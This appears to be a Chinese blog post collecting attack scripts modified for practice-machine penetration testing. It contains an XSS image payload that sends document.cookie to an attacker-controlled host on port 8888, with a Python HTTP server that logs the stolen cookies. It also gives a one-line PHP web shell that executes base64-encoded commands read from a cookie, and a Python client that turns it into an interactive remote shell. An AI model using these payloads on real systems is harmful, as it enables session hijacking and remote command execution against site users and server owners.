记录一些打靶机过程中修改的脚本。
<img src=x onerror="this.src=‘http://192.168.0.18:8888/?‘+document.cookie; this.removeAttribute(‘onerror‘);">
#!/usr/bin/env python
# POC for cookie stealing through XSS
# Should work with:
# <script>
# image = new Image();
# image.src=‘http://X.X.X.X:8888/?‘+document.cookie;
# </script>
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from datetime import datetime
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
query_components = parse_qs(urlparse(self.path).query)
print("")
print("%s - %s\t%s" % (
datetime.now().strftime("%Y-%m-%d %I:%M %p"),
self.client_address[0],
self.headers[‘user-agent‘]))
print("-------------------"*6)
for k, v in query_components.items():
print("%s\t\t\t%s" % (k.strip(), v))
# print query_components
# self.send_response(500)
# self.send_header("Content-type", "text/html")
# self.end_headers()
# self.wfile.write(c)
return
def log_message(self, format, *args):
return
if __name__ == "__main__":
try:
server = HTTPServer((‘0.0.0.0‘, 8888), MyHandler)
print(‘Started http server‘)
server.serve_forever()
except KeyboardInterrupt:
print(‘^C received, shutting down server‘)
server.socket.close()
原仓库同上
python3版本,对Windows和Linux的编码做了兼容
例
python cookie.py http://127.0.0.1/cookie_yjh.php
代码
#!/usr/bin/env python
"""
The following code is an alternative for GET and POST methods
as it uses _COOKIE global variable instead.
Should work with:
<?php system(base64_decode($_COOKIE["param"])); ?>
"""
from urllib.request import build_opener, HTTPHandler
from sys import argv
import base64
def execute(command, agent, debugLevel=0):
opener = build_opener(HTTPHandler(debuglevel=debugLevel))
cmd = base64.b64encode(command.encode())
opener.addheaders = [
(‘User-Agent‘, agent),
(‘Cookie‘, ‘param={0}‘.format(cmd.decode())),
]
sc = opener.open(argv[1]) # ‘http://localhost/uploads/co.php‘
#sc = opener.open("http://127.0.0.1/cookie_yjh.php")
raw_result = sc.read()
try:
result = raw_result.decode(‘utf8‘).strip()
except UnicodeDecodeError:
result = raw_result.decode(‘gb18030‘).strip()
print(‘\033[31m‘ + result + ‘\033[0m‘)
def main():
print("[+] Debug Level is set to be 0.")
agent = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; "
agent += "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; "
agent += ".NET CLR 3.5.30729; .NET CLR 3.0.30729; "
agent += "Media Center PC 6.0; .NET4.0C; .NET4.0E)"
while True:
command = input(‘shell:$ ‘)
if command != ‘exit‘:
execute(command, agent)
else:
break
if __name__ == ‘__main__‘:
main()
原文:https://www.cnblogs.com/wuerror/p/14999241.html